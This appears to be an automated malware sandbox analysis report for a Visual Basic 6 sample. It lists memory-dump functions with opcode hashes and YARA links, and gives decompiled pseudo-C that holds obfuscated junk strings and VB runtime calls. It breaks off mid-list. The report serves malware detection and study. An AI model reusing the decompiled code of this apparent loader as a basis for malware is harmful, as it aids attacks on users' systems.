Source File: 00000000.00000002.1172500569.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID:
String ID: U4`a
API String ID: 0-2713540521
Opcode ID: cde41bfc3dce0a3d41b97fec7d7733d1769cebf8b3f5fd12c17081ac8c7abada
Instruction ID: c68dd34fa9b1352a80afe12b3de93951ae7077836e63262a9e63e8a5bc481d0f
Opcode Fuzzy Hash: cde41bfc3dce0a3d41b97fec7d7733d1769cebf8b3f5fd12c17081ac8c7abada
Instruction Fuzzy Hash: 9F91DD7164430EAEEF3419508EA17FF22228FD23D0F25022BEF8653183D76E88C6851B

Uniqueness

Uniqueness Score: -1.00%

Function 004F09C6, Relevance: 1.6, Strings: 1, Instructions: 304COMMON

Download Yara Rule

Strings

U4`a, xrefs: 004F0A4E

Memory Dump Source

Source File: 00000000.00000002.1172500569.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID:
String ID: U4`a
API String ID: 0-2713540521
Opcode ID: a439773acbdd53173e40dd5ff17e141a1dcb1718252481e232ba25ee808662b0
Instruction ID: 0fbeaaa6d108d6b952b8783bb754bf566808112ce07d1a4641a4a0868aff36a8
Opcode Fuzzy Hash: a439773acbdd53173e40dd5ff17e141a1dcb1718252481e232ba25ee808662b0
Instruction Fuzzy Hash: 1C81AE6164430EAEEF3419548EA57FB22278FD23D4F25022BEF8653283D75D88C6951B

Uniqueness

Uniqueness Score: -1.00%

Function 004F0983, Relevance: 1.5, Strings: 1, Instructions: 299COMMON

Download Yara Rule

Strings

U4`a, xrefs: 004F0A4E

Memory Dump Source

Source File: 00000000.00000002.1172500569.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID:
String ID: U4`a
API String ID: 0-2713540521
Opcode ID: 34e3963b517e7660d3416703b57aa1d223091459184b07ecc32896f9d9507185
Instruction ID: 94c381aa692480cda07df9722208be3cbe22114a2735f727390c8a89b139de80
Opcode Fuzzy Hash: 34e3963b517e7660d3416703b57aa1d223091459184b07ecc32896f9d9507185
Instruction Fuzzy Hash: DD819D7564430EAEEF3419548EA67FB22279FD23D0F25022BEF8653183D76D88C6851B

Uniqueness

Uniqueness Score: -1.00%

Function 004F0A06, Relevance: 1.5, Strings: 1, Instructions: 289COMMON

Download Yara Rule

Strings

U4`a, xrefs: 004F0A4E

Memory Dump Source

Source File: 00000000.00000002.1172500569.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID:
String ID: U4`a
API String ID: 0-2713540521
Opcode ID: b14cae7f905489c81347785ec9d3c199e031370c7c65e42dac4c5427c23e272b
Instruction ID: 4651efc14d007301627e7088fd741f8a5a0a6b8fd0f4d7d057c009ec3da5a5be
Opcode Fuzzy Hash: b14cae7f905489c81347785ec9d3c199e031370c7c65e42dac4c5427c23e272b
Instruction Fuzzy Hash: F381CE6564430EADEF3419549EA67FB22278FD23D0F25032BEF8643293D75E88C6851B

Uniqueness

Uniqueness Score: -1.00%

Function 004F0A04, Relevance: 1.5, Strings: 1, Instructions: 284COMMON

Download Yara Rule

Strings

U4`a, xrefs: 004F0A4E

Memory Dump Source

Source File: 00000000.00000002.1172500569.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID:
String ID: U4`a
API String ID: 0-2713540521
Opcode ID: d9e04afb325eea2f9f29f223342b0c6995bc55b84f5da02f92063ffe1b50496e
Instruction ID: 8fa338dd2120b5d503df2721f735578aed3c517f876e0ea45d8bb5c707be01bd
Opcode Fuzzy Hash: d9e04afb325eea2f9f29f223342b0c6995bc55b84f5da02f92063ffe1b50496e
Instruction Fuzzy Hash: C471AF61A4430EADFF3419548EA67FB22174F923D0F25022BEF8653293D75E88C6951B

Uniqueness

Uniqueness Score: -1.00%

Function 00408FEF, Relevance: .8, Instructions: 848COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1172398438.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1172392298.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1172410471.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1172416568.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e8aa954b7d0dc8b25a638eec256397d24a770a33c176e9e60bccafa8eb2c554
Instruction ID: 8357d624a20921549c44d69892f097e420a3dd9bed2e5ab3d80895acca7f452d
Opcode Fuzzy Hash: 3e8aa954b7d0dc8b25a638eec256397d24a770a33c176e9e60bccafa8eb2c554
Instruction Fuzzy Hash: 3642EF5191E3828AEF735624C4D0B0D7A90DF17741F348FABC890E74E2E62F99CA9653

Uniqueness

Uniqueness Score: -1.00%

Function 004F0A36, Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1172500569.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f418d300ff9429211bde00e0f8360fdc63bec2e48bcb0ce36ace41f413c6be8
Instruction ID: 6ba700521d9558b57323fa56064c075ab7e39238fd228277ec7cb1cfd356e005
Opcode Fuzzy Hash: 1f418d300ff9429211bde00e0f8360fdc63bec2e48bcb0ce36ace41f413c6be8
Instruction Fuzzy Hash: 7771BC6164430EADEF3418549EA67FB22278F923D0F25032BEF8643283D75E88C6951B

Uniqueness

Uniqueness Score: -1.00%

Function 004F0AC6, Relevance: .3, Instructions: 263COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1172500569.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a233bb6619802c3b25d2be6bb6b0d47135924275ecc067b5953c04852e824549
Instruction ID: 7c183a527d8abe5ab2857b78bd64e4498d713489668d9cc573d4cad37fd16ba7
Opcode Fuzzy Hash: a233bb6619802c3b25d2be6bb6b0d47135924275ecc067b5953c04852e824549
Instruction Fuzzy Hash: B0619D6064430EA9EF3424545EB67FB22638F923D4F25072BEF8643293D75E88C6850B

Uniqueness

Uniqueness Score: -1.00%

Function 004F0A82, Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1172500569.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90e65b283fee9fcc929419842f96eef654e9faf8a24e2d91368b3134f9e4a124
Instruction ID: 9c08f1c57072a147fa8c3fe8fb26cd96d3fe27d08beffabb278700b57c52fa2f
Opcode Fuzzy Hash: 90e65b283fee9fcc929419842f96eef654e9faf8a24e2d91368b3134f9e4a124
Instruction Fuzzy Hash: 57617B6164430EADEF3415545EA67FB22238F923D0F65032BEF8643293E75E88C6850B

Uniqueness

Uniqueness Score: -1.00%

Function 004F0B23, Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1172500569.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b963d4466504fce151fcbc35b5e41d72b888769e29576c7e554b7e2f91be28dc
Instruction ID: 59f9b22dfb27323307dfad7439681e44a89e2aaabcda290449d2190359ba060e
Opcode Fuzzy Hash: b963d4466504fce151fcbc35b5e41d72b888769e29576c7e554b7e2f91be28dc
Instruction Fuzzy Hash: 72617D6564430EADEF3419549EB67FB22639F923D0F25022BEF86431D3D76E88C6850B

Uniqueness

Uniqueness Score: -1.00%

Function 004F0B4D, Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1172500569.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0fa114d82fcc53562ced361ff041070242e3ff2e8bb8745ee2f6305c8db1162
Instruction ID: 38f6acd58899d302f71e066f9e8f3c2fc4c7eff498c74eddbbfb7768c6735dbe
Opcode Fuzzy Hash: d0fa114d82fcc53562ced361ff041070242e3ff2e8bb8745ee2f6305c8db1162
Instruction Fuzzy Hash: 83615F6064430DADEF3419549DA67FA23679FD23D0F25022BEF8643193D76E8886851B

Uniqueness

Uniqueness Score: -1.00%

Function 004F660D, Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1172500569.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7e900e81ee30ce9535323f1ef69f5a93618081990b40536b650e1c2a6a92745
Instruction ID: bef4aeea0e74839d5822d33061693afcce7431c5d181e35423f6a9d2faeffb7d
Opcode Fuzzy Hash: c7e900e81ee30ce9535323f1ef69f5a93618081990b40536b650e1c2a6a92745
Instruction Fuzzy Hash: 3F5129749043468EDB21DF388590BA277E1DF22364F5AC29FCAD54B2E6C3388486C717

Uniqueness

Uniqueness Score: -1.00%

Function 004F664B, Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1172500569.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d1743b801edbadf036e685cfa81d943a10bc3274fb037ed76e3e63acacdab36
Instruction ID: d6b4ba0847ed7e271175d621804d7688cf19cb204d2e61f99ff5220d9372fce4
Opcode Fuzzy Hash: 7d1743b801edbadf036e685cfa81d943a10bc3274fb037ed76e3e63acacdab36
Instruction Fuzzy Hash: 6F5108745043468EDB21DF388594B62BBE1DF22364F9AC29FCAD64B2D6C3788486C717

Uniqueness

Uniqueness Score: -1.00%

Function 004F22E6, Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1172500569.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2daf81ba03baee7a76b31eb1eed243d4cfce8fc523ce565d4e047d5d8b18a7e
Instruction ID: 1524f7e4320f85bf46bd3e9f5b8c9cd68585c4963f421ddde43fd149b1edb7b0
Opcode Fuzzy Hash: c2daf81ba03baee7a76b31eb1eed243d4cfce8fc523ce565d4e047d5d8b18a7e
Instruction Fuzzy Hash: AE412870604308AFFB249E25CE55BF57391AF14754F62806FEE459B2D2C3BCC981CA1A

Uniqueness

Uniqueness Score: -1.00%

Function 004F0FC5, Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1172500569.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e61b5a205f00e194124aca995a59900038c75d7fbc11f757d9039ed0813cbc51
Instruction ID: 67cf4adf2abb82c086db5692f4fe3b089aff6d174db85e35f08a76cb0afd2899
Opcode Fuzzy Hash: e61b5a205f00e194124aca995a59900038c75d7fbc11f757d9039ed0813cbc51
Instruction Fuzzy Hash: 0E31AE3010430DEEEB2169254E667FB23266F47754F30011FFF82671A2C66D8886990F

Uniqueness

Uniqueness Score: -1.00%

Function 004F22EC, Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1172500569.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbd099055002bb322eb352162a3909a3b3244e41094ba8972494d29317540d4d
Instruction ID: b94203f4730b6a47f400cf8d3bb614110120c03f693f363f0785d2e83128fc95
Opcode Fuzzy Hash: cbd099055002bb322eb352162a3909a3b3244e41094ba8972494d29317540d4d
Instruction Fuzzy Hash: 2A212530244308EEEF355F249E96FB63290AF01B18F61802FAF056B2D2C7BC9542D91E

Uniqueness

Uniqueness Score: -1.00%

Function 004F2285, Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1172500569.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cf1eddef5ec1f50bfd47d7233733c7ed5e0f163958723573991c37ffe889a9b
Instruction ID: 4a8f35b28e5cf789ff225649b78f6866c2110f5748ed5640e126c8eb42fc7ae7
Opcode Fuzzy Hash: 0cf1eddef5ec1f50bfd47d7233733c7ed5e0f163958723573991c37ffe889a9b
Instruction Fuzzy Hash: 1D21D130244348AEFB255F248E5AFF577A5AF01B04F61806BEF019B1E2C3BC9542D92A

Uniqueness

Uniqueness Score: -1.00%

Function 004F231F, Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1172500569.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 962f8485e8ff2292bac8188cc3699aba321b3b4b3cf8a6e44a71b9a50f6a7150
Instruction ID: ee80a4ff06699834544b1a69629655fdd8ffc8dc90dc0f62f2e2119cbae56209
Opcode Fuzzy Hash: 962f8485e8ff2292bac8188cc3699aba321b3b4b3cf8a6e44a71b9a50f6a7150
Instruction Fuzzy Hash: 6611AF70244308EEFB359F249E8AFB572A5AF01B04F65806FAF055B1D2C3BC9542DA1A

Uniqueness

Uniqueness Score: -1.00%

Function 004F5D5D, Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1172500569.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd3641118e218b806745932ec63c7506bbbb88e1be52f8e7e597fab851eb0fd6
Instruction ID: bc844a9fbb9fad446e55652c807eba5438160f6334a8d40f2c6a107a6c9dfcdc
Opcode Fuzzy Hash: fd3641118e218b806745932ec63c7506bbbb88e1be52f8e7e597fab851eb0fd6
Instruction Fuzzy Hash: 25F06231702A089FE718CA59C5C8B7A7363AFD5700FA1C06B9B4287216D638E882DA59

Uniqueness

Uniqueness Score: -1.00%

Function 004F31F8, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1172500569.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6492338472d04cb9830f101480d6ce93ea5db50f9f59b930a653f3d510c2d3d
Instruction ID: 994b5127bcd07067a93a738ac14364ac5d67fd3612df81982d303dfc3ed192d4
Opcode Fuzzy Hash: f6492338472d04cb9830f101480d6ce93ea5db50f9f59b930a653f3d510c2d3d
Instruction Fuzzy Hash: 58C04C76141585CFF645DE08D592B9073B1FB11695BD50594E8429B651D32CED01CA40

Uniqueness

Uniqueness Score: -1.00%

Function 004F54C2, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1172500569.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b25a4b714fbca345544f88205260f1141d84cce96e6a3368cdcb1b44751f5f63
Instruction ID: dc7f171d9d4c8d67d6f8b8bcaeb9bb73521f467857b548cf3bab01ebcaa05f87
Opcode Fuzzy Hash: b25a4b714fbca345544f88205260f1141d84cce96e6a3368cdcb1b44751f5f63
Instruction Fuzzy Hash: 51B01234611AC0CFCE41CF08C180F1073B0FB04B00F1104C0F50187B11C228E901CD10

Uniqueness

Uniqueness Score: -1.00%

Function 00411808, Relevance: 43.9, APIs: 21, Strings: 4, Instructions: 186
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E00411808(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v32;
				intOrPtr _v36;
				char _v40;
				void* _v44;
				char _v60;
				char _v64;
				char* _v72;
				intOrPtr _v80;
				char* _v88;
				intOrPtr _v96;
				intOrPtr _v104;
				intOrPtr _v112;
				intOrPtr* _v132;
				signed int _v136;
				intOrPtr* _v140;
				signed int _v144;
				short _v148;
				intOrPtr* _v164;
				signed int _v168;
				signed int _v172;
				intOrPtr* _v176;
				signed int _v180;
				signed int _t81;
				signed int _t86;
				char* _t91;
				signed int _t99;
				void* _t123;
				intOrPtr _t124;

				_t124 = _t123 - 0x10;
				_push(0x401486);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t124;
				L00401480();
				_v20 = _t124;
				_v16 = 0x401468;
				_v12 = 0;
				_v8 = 0;
				_push(0x40dfc8);
				L00401522();
				if(0x98 != 2) {
					_v72 = L"radikalers";
					_v80 = 8;
					_v104 = 0x2ee93d;
					_v112 = 3;
					_push(0x10);
					L00401480();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0x10);
					L00401480();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(2);
					_push(L"ZtCWquSptjSm3r57PeAjpdM80");
					_push(_v36);
					L00401600();
					_t124 = _t124 + 0x2c;
				}
				_push(0);
				L004015B2();
				if( *0x41331c != 0) {
					_v164 = 0x41331c;
				} else {
					_push(0x41331c);
					_push(0x40da28);
					L004016DE();
					_v164 = 0x41331c;
				}
				_v132 =  *_v164;
				_t81 =  *((intOrPtr*)( *_v132 + 0x14))(_v132,  &_v44);
				asm("fclex");
				_v136 = _t81;
				if(_v136 >= 0) {
					_v168 = _v168 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x40da18);
					_push(_v132);
					_push(_v136);
					L004016D8();
					_v168 = _t81;
				}
				_v140 = _v44;
				_t86 =  *((intOrPtr*)( *_v140 + 0x50))(_v140,  &_v40);
				asm("fclex");
				_v144 = _t86;
				if(_v144 >= 0) {
					_v172 = _v172 & 0x00000000;
				} else {
					_push(0x50);
					_push(0x40da38);
					_push(_v140);
					_push(_v144);
					L004016D8();
					_v172 = _t86;
				}
				_push(_v40);
				_push(0);
				L00401690();
				asm("sbb eax, eax");
				_v148 =  ~( ~_t86 + 1);
				L004016C6();
				L004016C0();
				if(_v148 != 0) {
					if( *0x41331c != 0) {
						_v176 = 0x41331c;
					} else {
						_push(0x41331c);
						_push(0x40da28);
						L004016DE();
						_v176 = 0x41331c;
					}
					_v132 =  *_v176;
					_v88 = L"Notepaper9";
					_v96 = 8;
					_v72 = 0xfd;
					_v80 = 2;
					L00401480();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L00401480();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t99 =  *((intOrPtr*)( *_v132 + 0x38))(_v132, 0x10, 0x10,  &_v60);
					asm("fclex");
					_v136 = _t99;
					if(_v136 >= 0) {
						_v180 = _v180 & 0x00000000;
					} else {
						_push(0x38);
						_push(0x40da18);
						_push(_v132);
						_push(_v136);
						L004016D8();
						_v180 = _t99;
					}
					_push( &_v60);
					_push( &_v64);
					L00401516();
					_push( &_v64);
					_push( &_v32);
					L0040151C();
					L00401696();
				}
				_push(0x411ad7);
				_t91 =  &_v32;
				_push(_t91);
				_push(0);
				L0040158E();
				L004016C0();
				return _t91;
			}

0x0041180b
0x0041180e
0x00411819
0x0041181a
0x00411826
0x0041182e
0x00411831
0x00411838
0x0041183f
0x00411846
0x0041184b
0x00411858
0x0041185a
0x00411861
0x00411868
0x0041186f
0x00411876
0x00411879
0x00411883
0x00411884
0x00411885
0x00411886
0x00411887
0x0041188a
0x00411894
0x00411895
0x00411896
0x00411897
0x00411898
0x0041189a
0x0041189f
0x004118a2
0x004118a7
0x004118a7
0x004118aa
0x004118ac
0x004118b8
0x004118d5
0x004118ba
0x004118ba
0x004118bf
0x004118c4
0x004118c9
0x004118c9
0x004118e7
0x004118f6
0x004118f9
0x004118fb
0x00411908
0x00411927
0x0041190a
0x0041190a
0x0041190c
0x00411911
0x00411914
0x0041191a
0x0041191f
0x0041191f
0x00411931
0x00411949
0x0041194c
0x0041194e
0x0041195b
0x0041197d
0x0041195d
0x0041195d
0x0041195f
0x00411964
0x0041196a
0x00411970
0x00411975
0x00411975
0x00411984
0x00411987
0x00411989
0x00411990
0x00411995
0x0041199f
0x004119a7
0x004119b5
0x004119c2
0x004119df
0x004119c4
0x004119c4
0x004119c9
0x004119ce
0x004119d3
0x004119d3
0x004119f1
0x004119f4
0x004119fb
0x00411a02
0x00411a09
0x00411a17
0x00411a21
0x00411a22
0x00411a23
0x00411a24
0x00411a28
0x00411a32
0x00411a33
0x00411a34
0x00411a35
0x00411a3e
0x00411a41
0x00411a43
0x00411a50
0x00411a6f
0x00411a52
0x00411a52
0x00411a54
0x00411a59
0x00411a5c
0x00411a62
0x00411a67
0x00411a67
0x00411a79
0x00411a7d
0x00411a7e
0x00411a86
0x00411a8a
0x00411a8b
0x00411a93
0x00411a93
0x00411a98
0x00411ac3
0x00411ac6
0x00411ac7
0x00411ac9
0x00411ad1
0x00411ad6

APIs

__vbaChkstk.MSVBVM60(?,00401486), ref: 00411826
__vbaUI1Str.MSVBVM60(0040DFC8,?,?,?,?,00401486), ref: 0041184B
__vbaChkstk.MSVBVM60 ref: 00411879
__vbaChkstk.MSVBVM60 ref: 0041188A
__vbaLateMemCall.MSVBVM60(?,ZtCWquSptjSm3r57PeAjpdM80,00000002), ref: 004118A2
__vbaOnError.MSVBVM60(00000000,0040DFC8,?,?,?,?,00401486), ref: 004118AC
__vbaNew2.MSVBVM60(0040DA28,0041331C,00000000,0040DFC8,?,?,?,?,00401486), ref: 004118C4
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA18,00000014), ref: 0041191A
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA38,00000050), ref: 00411970
__vbaStrCmp.MSVBVM60(00000000,?), ref: 00411989
__vbaFreeStr.MSVBVM60(00000000,?), ref: 0041199F
__vbaFreeObj.MSVBVM60(00000000,?), ref: 004119A7
__vbaNew2.MSVBVM60(0040DA28,0041331C,00000000,?), ref: 004119CE
__vbaChkstk.MSVBVM60(?,00000000,?), ref: 00411A17
__vbaChkstk.MSVBVM60(?,00000000,?), ref: 00411A28
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA18,00000038), ref: 00411A62
__vbaVar2Vec.MSVBVM60(?,?), ref: 00411A7E
__vbaAryMove.MSVBVM60(?,?,?,?), ref: 00411A8B
__vbaFreeVar.MSVBVM60(?,?,?,?), ref: 00411A93
__vbaAryDestruct.MSVBVM60(00000000,?,00411AD7,00000000,?), ref: 00411AC9
__vbaFreeObj.MSVBVM60(00000000,?,00411AD7,00000000,?), ref: 00411AD1

Strings

Notepaper9, xrefs: 004119F4
=., xrefs: 00411868
ZtCWquSptjSm3r57PeAjpdM80, xrefs: 0041189A
radikalers, xrefs: 0041185A

Memory Dump Source

Source File: 00000000.00000002.1172398438.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1172392298.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1172410471.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1172416568.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Chkstk$Free$CheckHresult$New2$CallDestructErrorLateMoveVar2
String ID: =.$Notepaper9$ZtCWquSptjSm3r57PeAjpdM80$radikalers
API String ID: 444379525-170888267
Opcode ID: c4f2a0f5720827e77ff16eb0dc8dc73deb86fa8822b1780c89546a8ae62454ea
Instruction ID: 1ab5d4d20f727c59b2a46f8a1139154798e8e491d89d64756be714fe979c2bef
Opcode Fuzzy Hash: c4f2a0f5720827e77ff16eb0dc8dc73deb86fa8822b1780c89546a8ae62454ea
Instruction Fuzzy Hash: 3D713871D10218AFDB10EF95CC46BDDBBB5BF05308F1084AAF505BB1A1CBB95A898F19

Uniqueness

Uniqueness Score: -1.00%

Function 00410AF6, Relevance: 43.9, APIs: 22, Strings: 3, Instructions: 155
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E00410AF6(void* __ebx, void* __edi, void* __esi, long long __fp0, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				long long _v32;
				intOrPtr _v36;
				void* _v40;
				void* _v44;
				char _v60;
				char* _v68;
				intOrPtr _v76;
				void* _v80;
				signed int _v84;
				intOrPtr* _v88;
				signed int _v92;
				intOrPtr* _v104;
				signed int _v108;
				signed int _v112;
				signed int _t62;
				signed int _t66;
				signed int _t76;
				signed int _t81;
				void* _t103;
				void* _t105;
				intOrPtr _t106;
				long long _t112;

				_t112 = __fp0;
				_t106 = _t105 - 0xc;
				 *[fs:0x0] = _t106;
				L00401480();
				_v16 = _t106;
				_v12 = 0x4013d0;
				_v8 = 0;
				_t62 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x58,  *[fs:0x0], 0x401486, _t103);
				_push(0x40dec4);
				L00401570();
				L0040168A();
				_push(_t62);
				_push(0x40dae0);
				L00401690();
				asm("sbb eax, eax");
				_v80 =  ~( ~( ~_t62));
				L004016C6();
				_t66 = _v80;
				if(_t66 != 0) {
					_push(0);
					_push(L"sindrig");
					_push( &_v60);
					L004015D6();
					_t66 = 0x10;
					L00401480();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0);
					_push(_v36);
					L00401630();
					L00401696();
				}
				_push(1);
				_push(0x40dee0);
				L0040156A();
				L0040168A();
				_push(_t66);
				_push(0x40dec4);
				L00401690();
				asm("sbb eax, eax");
				_v80 =  ~( ~( ~_t66));
				L004016C6();
				if(_v80 != 0) {
					_v68 = L"Subindices5";
					_v76 = 8;
					L0040167E();
					_push(2);
					_push( &_v60);
					L00401564();
					_v32 = _t112;
					L00401696();
				}
				if( *0x41331c != 0) {
					_v104 = 0x41331c;
				} else {
					_push(0x41331c);
					_push(0x40da28);
					L004016DE();
					_v104 = 0x41331c;
				}
				_v80 =  *_v104;
				_t76 =  *((intOrPtr*)( *_v80 + 0x14))(_v80,  &_v44);
				asm("fclex");
				_v84 = _t76;
				if(_v84 >= 0) {
					_v108 = _v108 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x40da18);
					_push(_v80);
					_push(_v84);
					L004016D8();
					_v108 = _t76;
				}
				_v88 = _v44;
				_v68 = 0x80020004;
				_v76 = 0xa;
				L00401480();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t81 =  *((intOrPtr*)( *_v88 + 0x13c))(_v88, L"luftkonditioneringen", 0x10);
				asm("fclex");
				_v92 = _t81;
				if(_v92 >= 0) {
					_v112 = _v112 & 0x00000000;
				} else {
					_push(0x13c);
					_push(0x40da38);
					_push(_v88);
					_push(_v92);
					L004016D8();
					_v112 = _t81;
				}
				L004016C0();
				asm("wait");
				_push(0x410d08);
				L004016C0();
				return _t81;
			}

0x00410af6
0x00410af9
0x00410b08
0x00410b12
0x00410b1a
0x00410b1d
0x00410b24
0x00410b33
0x00410b36
0x00410b3b
0x00410b45
0x00410b4a
0x00410b4b
0x00410b50
0x00410b57
0x00410b5d
0x00410b64
0x00410b69
0x00410b6f
0x00410b71
0x00410b73
0x00410b7b
0x00410b7c
0x00410b83
0x00410b84
0x00410b8e
0x00410b8f
0x00410b90
0x00410b91
0x00410b92
0x00410b94
0x00410b97
0x00410b9f
0x00410b9f
0x00410ba4
0x00410ba6
0x00410bab
0x00410bb5
0x00410bba
0x00410bbb
0x00410bc0
0x00410bc7
0x00410bcd
0x00410bd4
0x00410bdf
0x00410be1
0x00410be8
0x00410bf5
0x00410bfa
0x00410bff
0x00410c00
0x00410c05
0x00410c0b
0x00410c0b
0x00410c17
0x00410c31
0x00410c19
0x00410c19
0x00410c1e
0x00410c23
0x00410c28
0x00410c28
0x00410c3d
0x00410c4c
0x00410c4f
0x00410c51
0x00410c58
0x00410c71
0x00410c5a
0x00410c5a
0x00410c5c
0x00410c61
0x00410c64
0x00410c67
0x00410c6c
0x00410c6c
0x00410c78
0x00410c7b
0x00410c82
0x00410c8c
0x00410c96
0x00410c97
0x00410c98
0x00410c99
0x00410ca7
0x00410cad
0x00410caf
0x00410cb6
0x00410cd2
0x00410cb8
0x00410cb8
0x00410cbd
0x00410cc2
0x00410cc5
0x00410cc8
0x00410ccd
0x00410ccd
0x00410cd9
0x00410cde
0x00410cdf
0x00410d02
0x00410d07

APIs

__vbaChkstk.MSVBVM60(?,00401486), ref: 00410B12
#517.MSVBVM60(0040DEC4,?,?,?,?,00401486), ref: 00410B3B
__vbaStrMove.MSVBVM60(0040DEC4,?,?,?,?,00401486), ref: 00410B45
__vbaStrCmp.MSVBVM60(0040DAE0,00000000,0040DEC4,?,?,?,?,00401486), ref: 00410B50
__vbaFreeStr.MSVBVM60(0040DAE0,00000000,0040DEC4,?,?,?,?,00401486), ref: 00410B64
#716.MSVBVM60(?,sindrig,00000000,0040DAE0,00000000,0040DEC4,?,?,?,?,00401486), ref: 00410B7C
__vbaChkstk.MSVBVM60(?,sindrig,00000000,0040DAE0,00000000,0040DEC4,?,?,?,?,00401486), ref: 00410B84
__vbaLateIdSt.MSVBVM60(?,00000000,?,sindrig,00000000,0040DAE0,00000000,0040DEC4,?,?,?,?,00401486), ref: 00410B97
__vbaFreeVar.MSVBVM60(?,00000000,?,sindrig,00000000,0040DAE0,00000000,0040DEC4,?,?,?,?,00401486), ref: 00410B9F
#616.MSVBVM60(0040DEE0,00000001,0040DAE0,00000000,0040DEC4,?,?,?,?,00401486), ref: 00410BAB
__vbaStrMove.MSVBVM60(0040DEE0,00000001,0040DAE0,00000000,0040DEC4,?,?,?,?,00401486), ref: 00410BB5
